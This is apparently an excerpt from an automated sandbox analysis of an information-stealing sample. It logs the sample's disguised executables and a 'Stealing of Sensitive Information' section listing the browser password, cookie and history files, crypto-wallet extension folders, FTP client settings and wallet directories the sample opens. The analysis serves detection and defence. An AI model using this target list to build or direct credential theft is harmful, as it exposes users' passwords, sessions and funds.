      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_0027AFFD GetSystemTimeAsFileTime, 6_2_0027AFFD
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_0069D983 _free, GetTimeZoneInformation, 16_2_0069D983
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_003128D0 GetVersion, GetModuleHandleW, GetProcAddress, 6_2_003128D0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Binance
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

